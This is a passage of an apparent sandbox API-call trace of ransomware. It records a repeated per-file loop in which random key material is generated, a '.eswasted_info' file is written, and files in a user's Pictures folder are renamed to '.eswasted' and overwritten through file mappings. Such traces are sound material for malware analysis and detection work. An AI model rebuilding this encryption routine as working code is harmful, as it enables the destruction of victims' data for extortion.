phProv=0x111fde8*=0x4e5ff0) returned 1 [0080.642] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0080.642] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.643] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\Q_eBb\\LkrGX6.gif.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\q_ebb\\lkrgx6.gif.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0080.643] WriteFile (in: hFile=0xfc, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0080.644] SetEndOfFile (hFile=0xfc) returned 1 [0080.644] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.644] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0080.644] lstrcpyW (in: lpString1=0x4d922e, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.644] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\Q_eBb\\LkrGX6.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\q_ebb\\lkrgx6.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\Q_eBb\\LkrGX6.gif.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\q_ebb\\lkrgx6.gif.eswasted")) returned 1 [0080.645] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\Q_eBb\\LkrGX6.gif.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\q_ebb\\lkrgx6.gif.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0080.645] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0080.646] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0080.647] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0080.647] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.647] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0080.648] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0080.648] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.656] SetEndOfFile (hFile=0xfc) returned 1 [0080.658] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0080.658] CloseHandle (hObject=0xfc) returned 1 [0080.660] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0080.660] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0080.661] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0080.661] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.661] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\Q_eBb\\mM 6B_iICRJ.jpg") returned 72 [0080.661] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x29a) returned 0x4cb238 [0080.661] lstrcpyW (in: lpString1=0x4cb2c8, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.661] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0080.661] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0080.662] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0080.662] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.662] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\Q_eBb\\mM 6B_iICRJ.jpg.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\q_ebb\\mm 6b_iicrj.jpg.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0080.663] WriteFile (in: hFile=0xfc, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0080.711] SetEndOfFile (hFile=0xfc) returned 1 [0080.711] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.711] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0080.711] lstrcpyW (in: lpString1=0x4cb2c8, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.711] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\Q_eBb\\mM 6B_iICRJ.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\q_ebb\\mm 6b_iicrj.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\Q_eBb\\mM 6B_iICRJ.jpg.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\q_ebb\\mm 6b_iicrj.jpg.eswasted")) returned 1 [0080.712] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\Q_eBb\\mM 6B_iICRJ.jpg.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\q_ebb\\mm 6b_iicrj.jpg.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0080.712] CreateFileMappingW (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0080.714] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0080.715] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0080.715] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.715] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0080.716] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0080.716] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.724] SetEndOfFile (hFile=0xfc) returned 1 [0080.726] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0080.726] CloseHandle (hObject=0xfc) returned 1 [0080.728] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4cb238 | out: hHeap=0x4a0000) returned 1 [0080.728] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0080.729] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0080.729] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.729] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\Q_eBb\\xoBhHp9YxDLj6B03CWE.jpg") returned 80 [0080.729] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2aa) returned 0x4f5f48 [0080.729] lstrcpyW (in: lpString1=0x4f5fe8, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.729] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0080.729] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0080.730] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0080.730] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.730] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\Q_eBb\\xoBhHp9YxDLj6B03CWE.jpg.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\q_ebb\\xobhhp9yxdlj6b03cwe.jpg.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0080.731] WriteFile (in: hFile=0xfc, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0080.732] SetEndOfFile (hFile=0xfc) returned 1 [0080.732] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.732] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0080.732] lstrcpyW (in: lpString1=0x4f5fe8, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.732] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\Q_eBb\\xoBhHp9YxDLj6B03CWE.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\q_ebb\\xobhhp9yxdlj6b03cwe.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\Q_eBb\\xoBhHp9YxDLj6B03CWE.jpg.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\q_ebb\\xobhhp9yxdlj6b03cwe.jpg.eswasted")) returned 1 [0080.733] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\Q_eBb\\xoBhHp9YxDLj6B03CWE.jpg.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\q_ebb\\xobhhp9yxdlj6b03cwe.jpg.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0080.733] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0080.736] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0080.737] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0080.737] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.737] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0080.737] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0080.737] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.746] SetEndOfFile (hFile=0xfc) returned 1 [0080.748] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0080.748] CloseHandle (hObject=0xfc) returned 1 [0080.749] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f5f48 | out: hHeap=0x4a0000) returned 1 [0080.749] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0080.750] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0080.750] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.750] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\Q_eBb\\y7lCSgaYgQpC0M-.gif") returned 76 [0080.750] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2a2) returned 0x4d91a8 [0080.750] lstrcpyW (in: lpString1=0x4d9240, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.750] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0080.750] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0080.751] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0080.751] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.751] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\Q_eBb\\y7lCSgaYgQpC0M-.gif.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\q_ebb\\y7lcsgaygqpc0m-.gif.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0080.752] WriteFile (in: hFile=0xfc, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0080.753] SetEndOfFile (hFile=0xfc) returned 1 [0080.753] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.753] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0080.753] lstrcpyW (in: lpString1=0x4d9240, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.753] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\Q_eBb\\y7lCSgaYgQpC0M-.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\q_ebb\\y7lcsgaygqpc0m-.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\Q_eBb\\y7lCSgaYgQpC0M-.gif.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\q_ebb\\y7lcsgaygqpc0m-.gif.eswasted")) returned 1 [0080.754] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\Q_eBb\\y7lCSgaYgQpC0M-.gif.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\q_ebb\\y7lcsgaygqpc0m-.gif.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0080.754] CreateFileMappingW (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0080.960] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0080.961] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0080.961] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.961] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0080.962] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0080.962] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.972] SetEndOfFile (hFile=0xfc) returned 1 [0080.974] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0080.974] CloseHandle (hObject=0xfc) returned 1 [0080.976] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0080.976] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0080.977] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0080.977] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.977] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\Uk9YfIhbYp4oMPfx.jpg") returned 71 [0080.977] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x298) returned 0x4ef6d0 [0080.977] lstrcpyW (in: lpString1=0x4ef75e, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.977] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0080.977] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0080.978] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0080.978] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.978] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\Uk9YfIhbYp4oMPfx.jpg.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\uk9yfihbyp4ompfx.jpg.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0080.979] WriteFile (in: hFile=0xfc, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0080.980] SetEndOfFile (hFile=0xfc) returned 1 [0080.980] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.980] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0080.980] lstrcpyW (in: lpString1=0x4ef75e, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.980] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\Uk9YfIhbYp4oMPfx.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\uk9yfihbyp4ompfx.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\Uk9YfIhbYp4oMPfx.jpg.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\uk9yfihbyp4ompfx.jpg.eswasted")) returned 1 [0080.981] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\Uk9YfIhbYp4oMPfx.jpg.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\uk9yfihbyp4ompfx.jpg.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0080.981] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0080.982] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0080.982] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0080.983] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.983] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0080.983] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0080.983] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.992] SetEndOfFile (hFile=0xfc) returned 1 [0080.994] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0080.994] CloseHandle (hObject=0xfc) returned 1 [0080.995] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef6d0 | out: hHeap=0x4a0000) returned 1 [0080.995] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0080.996] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0080.996] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.996] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\anikb6gG7bb0Y7wvRNp.gif") returned 86 [0080.996] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2b6) returned 0x4ef6d0 [0080.996] lstrcpyW (in: lpString1=0x4ef77c, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.996] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0080.996] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0080.997] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0080.997] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.997] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\anikb6gG7bb0Y7wvRNp.gif.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\anikb6gg7bb0y7wvrnp.gif.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0081.001] WriteFile (in: hFile=0xfc, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0081.001] SetEndOfFile (hFile=0xfc) returned 1 [0081.002] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.002] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0081.002] lstrcpyW (in: lpString1=0x4ef77c, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0081.002] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\anikb6gG7bb0Y7wvRNp.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\anikb6gg7bb0y7wvrnp.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\anikb6gG7bb0Y7wvRNp.gif.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\anikb6gg7bb0y7wvrnp.gif.eswasted")) returned 1 [0081.003] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 